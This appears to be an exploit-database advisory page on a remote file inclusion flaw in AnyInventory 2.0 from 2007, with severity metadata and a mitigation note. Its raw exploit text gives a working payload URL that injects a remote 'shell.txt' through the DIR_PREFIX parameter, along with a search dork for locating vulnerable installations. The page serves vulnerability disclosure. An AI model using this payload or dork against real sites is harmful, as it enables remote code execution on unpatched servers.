header-logo
Suggest Exploit
vendor:
AnyInventory
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote file inclusion
CWE
Product Name: AnyInventory
Affected Version From: AnyInventory 2.0
Affected Version To: AnyInventory 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AnyInventory => 2.0 Remote file inclusion

This exploit allows an attacker to include remote files by manipulating the 'DIR_PREFIX' parameter in the 'environment.php' file of AnyInventory version 2.0. By appending a malicious file path, an attacker can execute arbitrary code on the victim's system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of AnyInventory or implement proper input validation and sanitization to prevent file inclusion attacks.
Source

Exploit-DB raw data:

#AnyInventory => 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

# milw0rm.com [2007-09-05]

Navigation

Suggest Exploit

Services By CQR